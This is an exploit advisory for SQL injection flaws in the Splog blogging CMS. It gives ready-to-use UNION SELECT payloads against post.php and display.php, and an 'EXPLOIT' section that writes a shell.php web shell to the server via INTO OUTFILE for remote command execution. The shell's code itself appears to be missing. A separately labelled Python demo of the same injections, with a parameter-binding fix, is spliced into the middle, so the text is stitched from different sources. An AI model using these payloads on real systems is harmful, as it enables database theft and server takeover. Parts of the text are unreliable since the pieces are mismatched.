-----------------------------------------------------------------
MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->
-----------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://sourceforge.net/projects/splog/
-->DOWNLOAD: http://sourceforge.net/projects/splog/
-->DEMO: N/A
-->CATEGORY: CMS / Blogging
-->DESCRIPTION: Splog is a simple PHP and MySQL blogging framework allowing
full integration into a website by being designed for use...
-->RELEASED: 2009-06-01

CMS VULNERABILITY:

-->TESTED ON: Firefox 3
-->DORK: N/A
-->CATEGORY: SQL INJECTION
-->AFFECTED VERSION: <= 1.2-Beta (previous versions were checked and are also vulnerable)
-->Discovered bug date: 2009-06-08
-->Reported bug date: 2009-06-09
-->Fixed bug date: 2009-06-10
-->Info patch (1.3): http://sourceforge.net/projects/splog/
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (I love you, little one!)



#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


-------------------
PROOF OF CONCEPT:
-------------------


<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>



[++] GET var --> 'id'

[++] File vuln --> 'post.php'


~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+SELECT+1,user(),database(),version(),user(),database()%23



<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>


[++] POST var --> 'pCategory'

[++] File vuln --> 'display.php'


POST http://[HOST]/[PATH]/display.php HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Referer: http://[HOST]/[PATH]/display.php
Content-Type: application/x-www-form-urlencoded

pCategory=-1'+UNION+SELECT+1,2,3,4,5,6# <--- INJECTION


[++[Return]++] ~~~~~> user, version or database.
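The two injection contexts above, as an added example that is not part of this advisory or of Splog's own code: a constructed SQLite table stands in for the blog's posts table, the payloads are adapted from the advisory's (sqlite_version() replaces MySQL's user()/database()/version(), and "--" replaces MySQL's "#" comment marker), and the function names, column names and the trailing "AND author IS NOT NULL" clause are assumptions. It shows why the numeric 'id' injection in post.php goes through with a quote-escaping filter such as magic_quotes_gpc in place (the payload never needs a quote) while the quoted 'pCategory' injection in display.php is stopped by it, and that binding parameters closes both.

```python
import sqlite3

# Constructed stand-in for a blog's posts table (NOT Splog's real schema).
SCHEMA = """
CREATE TABLE posts (
    id INTEGER PRIMARY KEY, title TEXT, body TEXT,
    author TEXT, category TEXT, created TEXT
);
INSERT INTO posts VALUES (1, 'Hello', 'First post', 'admin', 'news', '2009-06-01');
INSERT INTO posts VALUES (2, 'Second', 'More text', 'admin', 'misc', '2009-06-02');
"""
COLS = "id, title, body, author, category, created"

# The engine version the injected row will carry; used to recognise it.
ENGINE_VERSION = sqlite3.sqlite_version

# Payloads in the shape the advisory shows for 'id' and 'pCategory', adapted to
# SQLite: sqlite_version() stands in for MySQL's user()/database()/version(),
# and "--" stands in for MySQL's "#" comment marker.
ID_PAYLOAD = "-1 UNION SELECT 1,sqlite_version(),3,4,5,6 --"
CATEGORY_PAYLOAD = "-1' UNION SELECT 1,sqlite_version(),3,4,5,6 --"


def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def escape_quotes(value):
    # Stand-in for a quote-escaping input filter such as PHP's magic_quotes_gpc
    # (which used a backslash; SQL-standard doubling is used here so the same
    # code runs on SQLite and MySQL).
    return value.replace("'", "''")


def post_by_id_unsafe(db, raw_id, filtered=False):
    # Numeric context: the value lands in the SQL without surrounding quotes, so
    # the payload needs no quote character and a quote-escaping filter changes
    # nothing. This is why post.php is exploitable with magic quotes ON or OFF.
    if filtered:
        raw_id = escape_quotes(raw_id)
    sql = f"SELECT {COLS} FROM posts WHERE id={raw_id} AND author IS NOT NULL"
    return db.execute(sql).fetchall()


def posts_by_category_unsafe(db, raw_category, filtered=False):
    # String context: the payload must first close the opening quote, so a
    # quote-escaping filter defeats this particular payload (the advisory's
    # "magic quotes=OFF" condition for display.php). Escaping is a property of
    # the filter, not of the query, and offers nothing once a value is used in
    # a numeric context such as the one above.
    if filtered:
        raw_category = escape_quotes(raw_category)
    sql = f"SELECT {COLS} FROM posts WHERE category='{raw_category}' AND author IS NOT NULL"
    return db.execute(sql).fetchall()


def post_by_id_safe(db, raw_id):
    # Hardened form: validate the type, then bind the value as a parameter so the
    # driver passes it separately from the SQL text and it can never alter the
    # statement's structure.
    try:
        post_id = int(raw_id)
    except ValueError:
        return []
    sql = f"SELECT {COLS} FROM posts WHERE id=? AND author IS NOT NULL"
    return db.execute(sql, (post_id,)).fetchall()


def posts_by_category_safe(db, raw_category):
    # Same binding for the string parameter; no escaping logic to get wrong.
    sql = f"SELECT {COLS} FROM posts WHERE category=? AND author IS NOT NULL"
    return db.execute(sql, (raw_category,)).fetchall()


def demo():
    """Run every variant against a fresh database and return the rows each yields."""
    db = open_db()
    return {
        "id_unsafe": post_by_id_unsafe(db, ID_PAYLOAD),
        "id_unsafe_filtered": post_by_id_unsafe(db, ID_PAYLOAD, filtered=True),
        "cat_unsafe": posts_by_category_unsafe(db, CATEGORY_PAYLOAD),
        "cat_unsafe_filtered": posts_by_category_unsafe(db, CATEGORY_PAYLOAD, filtered=True),
        "id_safe": post_by_id_safe(db, ID_PAYLOAD),
        "cat_safe": posts_by_category_safe(db, CATEGORY_PAYLOAD),
        "id_legit": post_by_id_safe(db, "2"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:20} -> {rows}")
```

Running it prints one injected row (carrying the engine version) for both unsafe lookups, the same injected row for the numeric lookup even with the quote filter applied, an empty result for the quoted lookup once the filter is applied, and empty results for both bound-parameter versions; only the legitimate id "2" returns a real post.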


----------
EXPLOIT:
----------


<<<<---------++++++++++++++ Extra-Condition: privileges to create files (the MySQL FILE privilege, required by INTO OUTFILE) +++++++++++++++++--------->>>>


[GET]~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+ALL+SELECT+'
YOUR SHELL IS ON!
','Get var (cmd) to execute comands. Enjoy it!
','Command Result:
','
','By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com
'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'%23

[POST]~~~~~>

POST http://[HOST]/[PATH]/display.php HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Referer: http://[HOST]/[PATH]/display.php
Content-Type: application/x-www-form-urlencoded

pCategory=-1'+UNION+ALL+SELECT+'YOUR SHELL IS ON!
','Get var (cmd) to execute comands. Enjoy it!
','Command Result:
','
','By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com
'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'# <--- INJECTION


[++[Return]++] ~~~~~> Your shell in http://[HOST]/[PATH]/shell.php




#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################